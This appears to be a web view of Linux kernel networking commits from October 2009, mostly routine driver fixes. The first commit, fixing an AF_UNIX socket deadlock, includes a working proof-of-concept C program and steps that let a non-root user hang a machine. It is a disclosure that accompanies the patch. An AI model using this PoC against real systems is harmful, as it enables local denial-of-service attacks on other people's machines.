1. 19 Oct, 2009 3 commits
    • Tomoki Sekiyama's avatar
      AF_UNIX: Fix deadlock on connecting to shutdown socket · 77238f2b
      Tomoki Sekiyama authored
      I found a deadlock bug in UNIX domain socket, which makes able to DoS
      attack against the local machine by non-root users.
      
      How to reproduce:
      1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
          namespace(*), and shutdown(2) it.
       2. Repeat connect(2)ing to the listening socket from the other sockets
          until the connection backlog is full-filled.
       3. connect(2) takes the CPU forever. If every core is taken, the
          system hangs.
      
      PoC code: (Run as many times as cores on SMP machines.)
      
      int main(void)
      {
      	int ret;
      	int csd;
      	int lsd;
      	struct sockaddr_un sun;
      
      	/* make an abstruct name address (*) */
      	memset(&sun, 0, sizeof(sun));
      	sun.sun_family = PF_UNIX;
      	sprintf(&sun.sun_path[1], "%d", getpid());
      
      	/* create the listening socket and shutdown */
      	lsd = socket(AF_UNIX, SOCK_STREAM, 0);
      	bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
      	listen(lsd, 1);
      	shutdown(lsd, SHUT_RDWR);
      
      	/* connect loop */
      	alarm(15); /* forcely exit the loop after 15 sec */
      	for (;;) {
      		csd = socket(AF_UNIX, SOCK_STREAM, 0);
      		ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
      		if (-1 == ret) {
      			perror("connect()");
      			break;
      		}
      		puts("Connection OK");
      	}
      	return 0;
      }
      
      (*) Make sun_path[0] = 0 to use the abstruct namespace.
          If a file-based socket is used, the system doesn't deadlock because
          of context switches in the file system layer.
      
      Why this happens:
       Error checks between unix_socket_connect() and unix_wait_for_peer() are
       inconsistent. The former calls the latter to wait until the backlog is
       processed. Despite the latter returns without doing anything when the
       socket is shutdown, the former doesn't check the shutdown state and
       just retries calling the latter forever.
      
      Patch:
       The patch below adds shutdown check into unix_socket_connect(), so
       connect(2) to the shutdown socket will return -ECONREFUSED.
      Signed-off-by: default avatarTomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
      Signed-off-by: default avatarMasanori Yoshida <masanori.yoshida.tv@hitachi.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      77238f2b
    • Thomas Chou's avatar
      ethoc: clear only pending irqs · 50c54a57
      Thomas Chou authored
      This patch fixed the problem of dropped packets due to lost of
      interrupt requests. We should only clear what was pending at the
      moment we read the irq source reg.
      Signed-off-by: default avatarThomas Chou <thomas@wytron.com.tw>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      50c54a57
    • Thomas Chou's avatar
      ethoc: inline regs access · 16dd18b0
      Thomas Chou authored
      Signed-off-by: default avatarThomas Chou <thomas@wytron.com.tw>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      16dd18b0
  2. 17 Oct, 2009 1 commit
    • Randy Dunlap's avatar
      vmxnet3: use dev_dbg, fix build for CONFIG_BLOCK=n · f6965582
      Randy Dunlap authored
      vmxnet3 was using dprintk() for debugging output.  This was
      defined in <linux/dst.h> and was the only thing that was
      used from that header file.  This caused compile errors
      when CONFIG_BLOCK was not enabled due to bio* and BIO*
      uses in the header file, so change this driver to use
      dev_dbg() for debugging output.
      
      include/linux/dst.h:520: error: dereferencing pointer to incomplete type
      include/linux/dst.h:520: error: 'BIO_POOL_BITS' undeclared (first use in this function)
      include/linux/dst.h:521: error: dereferencing pointer to incomplete type
      include/linux/dst.h:522: error: dereferencing pointer to incomplete type
      include/linux/dst.h:525: error: dereferencing pointer to incomplete type
      make[4]: *** [drivers/net/vmxnet3/vmxnet3_drv.o] Error 1
      Signed-off-by: default avatarRandy Dunlap <randy.dunlap@oracle.com>
      Signed-off-by: default avatarBhavesh Davda <bhavesh@vmware.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      f6965582
  3. 15 Oct, 2009 4 commits
    • Eric Dumazet's avatar
      virtio_net: use dev_kfree_skb_any() in free_old_xmit_skbs() · ed79bab8
      Eric Dumazet authored
      Because netpoll can call netdevice start_xmit() method with
      irqs disabled, drivers should not call kfree_skb() from
      their start_xmit(), but use dev_kfree_skb_any() instead.
      
      Oct  8 11:16:52 172.30.1.31 [113074.791813] ------------[ cut here ]------------
      Oct  8 11:16:52 172.30.1.31 [113074.791813] WARNING: at net/core/skbuff.c:398 \
                      skb_release_head_state+0x64/0xc8()
      Oct  8 11:16:52 172.30.1.31 [113074.791813] Hardware name:
      Oct  8 11:16:52 172.30.1.31 [113074.791813] Modules linked in: netconsole ocfs2 jbd2 quota_tree \
      ocfs2_dlmfs ocfs2_stack_o2cb ocfs2_dlm ocfs2_nodemanager ocfs2_stackglue configfs crc32c drbd cn loop \
      serio_raw psmouse snd_pcm snd_timer snd soundcore snd_page_alloc virtio_net pcspkr parport_pc parport \
      i2c_piix4 i2c_core button processor evdev ext3 jbd mbcache dm_mirror dm_region_hash dm_log dm_snapshot \
      dm_mod ide_cd_mod cdrom ata_generic ata_piix virtio_blk libata scsi_mod piix ide_pci_generic ide_core \
                      virtio_pci virtio_ring virtio floppy thermal fan thermal_sys [last unloaded: netconsole]
      Oct  8 11:16:52 172.30.1.31 [113074.791813] Pid: 11132, comm: php5-cgi Tainted: G        W  \
                      2.6.31.2-vserver #1
      Oct  8 11:16:52 172.30.1.31 [113074.791813] Call Trace:
      Oct  8 11:16:52 172.30.1.31 [113074.791813] <IRQ>  [<ffffffff81253cd5>] ? \
                      skb_release_head_state+0x64/0xc8
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81253cd5>] ? skb_release_head_state+0x64/0xc8
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81049ae1>] ? warn_slowpath_common+0x77/0xa3
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81253cd5>] ? skb_release_head_state+0x64/0xc8
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81253a1a>] ? __kfree_skb+0x9/0x7d
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffffa01cb139>] ? free_old_xmit_skbs+0x51/0x6e \
                      [virtio_net]
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffffa01cbc85>] ? start_xmit+0x26/0xf2 [virtio_net]
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff8126934f>] ? netpoll_send_skb+0xd2/0x205
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffffa0429216>] ? write_msg+0x90/0xeb [netconsole]
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81049f06>] ? __call_console_drivers+0x5e/0x6f
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff8102b49d>] ? kvm_clock_read+0x4d/0x52
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff8104a082>] ? release_console_sem+0x115/0x1ba
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff8104a632>] ? vprintk+0x2f2/0x34b
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff8106b142>] ? vx_update_load+0x18/0x13e
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81308309>] ? printk+0x4e/0x5d
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff8102b49d>] ? kvm_clock_read+0x4d/0x52
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81070b62>] ? getnstimeofday+0x55/0xaf
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81062683>] ? ktime_get_ts+0x21/0x49
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff810626b7>] ? ktime_get+0xc/0x41
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81062788>] ? hrtimer_interrupt+0x9c/0x146
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81024a4b>] ? smp_apic_timer_interrupt+0x80/0x93
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81011663>] ? apic_timer_interrupt+0x13/0x20
      Oct  8 11:16:52 172.30.1.31 [113074.791813] <EOI>  [<ffffffff8130a9eb>] ? _spin_unlock_irq+0xd/0x31
      Reported-and-tested-by: default avatarMassimo Cetra <mcetra@navynet.it>
      Signed-off-by: default avatarEric Dumazet <eric.dumazet@gmail.com>
      Bug-Entry: http://bugzilla.kernel.org/show_bug.cgi?id=14378Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      ed79bab8
    • Sathya Perla's avatar
      be2net: fix support for PCI hot plug · 43a04fdc
      Sathya Perla authored
      Before issuing any cmds to the FW, the driver must first wait
      till the fW becomes ready. This is needed for PCI hot plug when
      the driver can be probed while the card fw is being initialized.
      Signed-off-by: default avatarSathya Perla <sathyap@serverengines.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      43a04fdc
    • Sathya Perla's avatar
    • Randy Dunlap's avatar
      vmxnet: fix 2 build problems · 8f7e524c
      Randy Dunlap authored
      vmxnet3 uses in_dev* interfaces so it should depend on INET.
      Also fix so that the driver builds when CONFIG_PCI_MSI is disabled.
      
      vmxnet3_drv.c:(.text+0x2a88cb): undefined reference to `in_dev_finish_destroy'
      
      drivers/net/vmxnet3/vmxnet3_drv.c:1335: error: 'struct vmxnet3_intr' has no member named 'msix_entries'
      drivers/net/vmxnet3/vmxnet3_drv.c:1384: error: 'struct vmxnet3_intr' has no member named 'msix_entries'
      drivers/net/vmxnet3/vmxnet3_drv.c:2137: error: 'struct vmxnet3_intr' has no member named 'msix_entries'
      drivers/net/vmxnet3/vmxnet3_drv.c:2138: error: 'struct vmxnet3_intr' has no member named 'msix_entries'
      Signed-off-by: default avatarRandy Dunlap <randy.dunlap@oracle.com>
      Signed-off-by: default avatarBhavesh davda <bhavesh@vmware.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      8f7e524c
  4. 14 Oct, 2009 4 commits
  5. 13 Oct, 2009 14 commits
  6. 12 Oct, 2009 10 commits
  7. 09 Oct, 2009 4 commits